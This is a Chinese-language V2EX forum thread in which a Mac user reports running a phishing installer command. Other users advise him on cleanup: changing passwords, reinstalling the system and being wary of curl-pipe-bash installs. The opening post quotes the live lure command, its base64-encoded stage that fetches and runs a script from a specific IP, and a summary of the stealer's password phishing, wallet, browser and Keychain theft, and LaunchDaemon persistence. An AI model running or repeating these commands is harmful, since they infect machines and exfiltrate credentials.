下载 Mac 软件执行了一个钓鱼脚本怎么办?怎么避免自己的账户和财产受损? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
neetz
V2EX    Apple

下载 Mac 软件执行了一个钓鱼脚本怎么办?怎么避免自己的账户和财产受损?

  •  
  •   neetz 16 小时 51 分钟前 1305 次点击

    趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件

    刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

    感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

    看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

    看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令

    1. 窃取密码 它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。

    2. 窃取加密货币钱包 (主要目标) 浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。

    桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

    1. 窃取各类浏览器数据 它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。

    窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

    1. 窃取个人敏感文件 钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。

    备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

    本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

    1. 打包上传,发送给黑客 它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

    然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。

    1. 植入后门并替换正常程序 持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。

    程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

    这个是不是只能重装系统了?我还要做什么来保护自己的账户吗

    26 条回复    2025-10-19 20:06:12 +08:00
    neetz
        1
    neetz  
    OP
       16 小时 50 分钟前
    虽然我没有加密钱包之类的东西,但是是不是浏览器存储的钥匙串密码已经全被拿走了?
    neetz
        2
    neetz  
    OP
       16 小时 42 分钟前
    ~ vim .pwd
    ~ vim .username
    ~ ls -l /Library/LaunchDaemons/
    total 88
    -rw-r--r--@ 1 root wheel 485 10 月 19 03:47 com.22622.plist
    -rw-r--r--@ 1 root wheel 8012 10 月 19 03:49 com.77686.plist

    照着 gemini 确认了一下...确实钓鱼脚本被我执行成功了...
    moudy
        3
    moudy  
       16 小时 11 分钟前   1
    有一说一, /bin/bash -c "$(curl xxx)”这种指令真的是太扯蛋了。竟然在 mac 和 linux 上普遍使用,实在是无法理解。
    dilidilid
        4
    dilidilid  
       15 小时 46 分钟前
    keychain 泄漏的话没啥好的方法,不过现在重要的账号都是动态验证码吧,所以我一直不理解把重要账号的 OTP 密钥保存在 keychain 是什么心态,我只会在手机离线 App 上保存 OTP
    dilidilid
        5
    dilidilid  
       15 小时 43 分钟前
    @moudy 因为对于普通用户就不应该使用 Terminal ,这本来就是给开发者和专业用户的用法,普通用户只应该运行官网下载和以及 App store 里的软件。非要这么说的话 Windows 上让你打开 powershell 运行某个远程脚本 run as administrator 连密码都不需要输入,点个 yes 就能把敏感信息直接打包带走呢
    neetz
        6
    neetz  
    OP
       15 小时 12 分钟前
    先把常用的账号密码全改了,剩下的睡一觉起来再说...

    真的是脑子抽风了,如果是下载 Windows 要我执行 vbs 脚本我肯定理都不理它,偏偏 mac 很多软件都是通过 brew 执行 shell 脚本安装的,大半夜完全没反应过来直到执行完了才意识到要检查脚本内容

    还好我不玩虚拟货币,看起来这个脚本内容主要目标是这玩意。希望泄露的信息最多被用来撞库啥的
    MacsedProtoss
        7
    MacsedProtoss  
       12 小时 49 分钟前 via iPhone
    @moudy 你在搞笑吧,你是开发者吗? curl 都不让用?你可以直接审查下载下来的脚本,你看到这个指令可以选择不直接执行而是先下载那个脚本下来自己看看再运行。他就是分两步先用 curl 把 sh 脚本拉下来再 bash 来执行罢了
    MacsedProtoss
        8
    MacsedProtoss  
       12 小时 45 分钟前 via iPhone
    @neetz 重点在于它要求你输入密码这一步,一般这个时候要高度警惕,通常并不需要密码才对,有了密码那就可以提权才能做大部分东西,否则默认访问沙盒或者访问 keychain 之类的应该都是没权限的,偷不了太多(唯一要注意的可能是 ssh key 这种没加密码的话挺危险)
    Crump
        9
    Crump  
       11 小时 42 分钟前
    这种案例我见过好多次了,大部分都是折腾盗版软件的稀里糊涂就被坑了,如果不是那就说明你真的是闲得慌瞎折腾。剩下的就是该改密码改密码,系统重装。
    busier
        10
    busier  
       11 小时 42 分钟前 via iPhone
    @dilidilid #5

    你确定? win 下浏览器配置文件等等属于用户轮廓文件 在路径%userprofile%中,根本不用提升管理员就能盗走
    Cooky
        11
    Cooky  
       11 小时 38 分钟前
    不明不白的折腾就得加小心,win 下用沙盘,linux 下用 docker
    qbmiller
        12
    qbmiller  
       11 小时 25 分钟前
    @moudy 好多开源都这样一键安装...
    avrillavigne
        13
    avrillavigne  
       10 小时 58 分钟前
    被包含于: Online Malicious URL Blocklist
    ysc3839
        14
    ysc3839  
       8 小时 52 分钟前 via Android
    先重装系统,再改密码,不重装就改还有可能被盗
    shinecurve
        15
    shinecurve  
       7 小时 42 分钟前
    我一直以为只要懂点命令行的,不轻易执行这种链接指向的脚本是常识...
    loganovo
        16
    loganovo  
       7 小时 11 分钟前
    我连用 homebrew 装东西, 都要先 info 一下, 看看 rb 脚本, 然后再 install 的, 有和我一样的吗;
    但是 upgrade 的时候就懒得一一再去看了;
    确实没有发现过有恶意的代码, 但是我不愿执行的操作却有一大堆,这时候我都选择手动安装
    neetz
        17
    neetz  
    OP
       6 小时 9 分钟前
    @Crump 研究怎么在 Mac 玩游戏,找到俄罗斯的网站上去了
    moudy
        18
    moudy  
       2 小时 39 分钟前
    @qbmiller 是的,brew 就得这么装,但是不代表我认可这种发布形式。这要是供应链投个毒,真的是死都不知道怎么死的。
    moudy
        19
    moudy  
       2 小时 34 分钟前
    @MacsedProtoss 下载审查后执行是对的。如果能有一个通用的安全检测流程,或者沙盒模拟机制来确认脚本安全性就会好很多。类似 bash-sandbox -c “$(curl ……)”
    dilidilid
        20
    dilidilid  
       2 小时 24 分钟前 via iPhone
    @moudy brew 本来也是给开发者用的,面向开发者的部署本来就需要在安全和效率之间做权衡。针对普通用户的分发渠道是 App Store ,那玩意儿始终运行在沙盒里。你说的模拟对 brew 没啥意义,真投毒的话你不审查代码的话根本查不出来,怎么确认安全性?要么就一直运行在沙盒,那可以用 docker 或者 orbstack
    moudy
        21
    moudy  
       2 小时 18 分钟前
    @dilidilid 醒醒,谁告诉你 brew 是给开发者用的。n 多有用的软件你去搜官网都是让你 brew 安装。这玩意就是第二个 appstore 。shell 脚本最终能做的也就那些事。读取敏感文件,安装 daemon ,替换 library 或关键 binary 。行为识别已经能卡住大部分恶意脚本了。
    dilidilid
        22
    dilidilid  
       1 小时 49 分钟前 via iPhone
    @moudy 你说的那 n 多软件基本都是开源软件,开源软件本身就存在更多的供应链风险,你用沙箱测试能规避吗?
    我说开发者可能有点极端了,但 brew 确实基本上都是 Pro 用户在用,你可以问问非 Pro 用户买 Mac 的有几个装了 homebrew 。
    作为一个佐证,brew 最近一年 install_on_request 事件一共只有一亿次不到,这是包括全平台以及每个包被安装都会计数,homebrew 的 macOS 实际活跃用户估计也就在千万水平,和 macOS 的总体用户规模相去甚远
    dilidilid
        23
    dilidilid  
       1 小时 46 分钟前 via iPhone
    @moudy 你说的行为识别,Windows
    dilidilid
        24
    dilidilid  
       1 小时 43 分钟前 via iPhone
    @moudy 你说的行为识别是杀毒软件的需求,Windows 也是默认这么做的,代价就是性能和 IO 耗损以及误杀,这也是很多人抱怨 Windows 文件系统性能差的一个重要原因。mac 平台上的“供应链投毒”显然没有到需要牺牲流畅度去这么做的程度,如果真的特别在意可以在 Mac 上安装第三方杀毒软件
    MYDB
        25
    MYDB  
       1 小时 38 分钟前 via iPhone
    1.物理断网
    2.抢救一些重要资料(每个文件都自己过目一遍,不要让 AI 帮你)
    3.重装系统和软件,如果有 nas 备份可以从那里还原,但系统自带的还原就不要相信了
    4.联网,一一修改密码
    aero99
        26
    aero99  
       55 分钟前
    Mac 上那个有个防火墙软件忘了名字了,装上可以阻止一部分陌生 ip 访问或者询问
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2771 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 21ms UTC 13:01 PVG 21:01 LAX 06:01 JFK 09:01
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86